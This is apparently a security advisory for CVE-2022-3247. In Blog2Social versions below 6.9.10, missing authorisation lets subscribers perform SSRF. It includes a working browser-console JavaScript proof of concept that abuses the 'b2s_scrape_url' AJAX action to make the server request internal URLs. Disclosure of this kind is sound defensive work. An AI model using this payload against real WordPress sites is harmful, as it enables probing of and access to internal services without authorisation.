Blog2Social < 6.9.10 – Subscriber+ SSRF | CVE 2022-3247

Description

The plugin does not have authorisation in an AJAX action, and does not ensure that the URL to make a request to is an external one. As a result, any authenticated users, such as subscriber could perform SSRF attacks

Proof of Concept

Run this script in the web browser console while being logged in as a subscriber and on the Blog2Social Dashboard page (wp-admin/admin.php?page=blog2social)

// Set this callback_url to the internal url you want the server to call
callback_url = 'http://127.0.0.1:8080/';
wp_site_ajax_url = 'https://example.com/wp-admin/admin-ajax.php';

// Don't edit below
data = new FormData();
data.append('action', 'b2s_scrape_url');
data.append('url', callback_url);
data.append('b2s_security_nonce', jQuery('#b2s_security_nonce').val());

fetch(wp_site_ajax_url, {
    method: 'POST',
    credentials: 'same-origin',
    body: data
});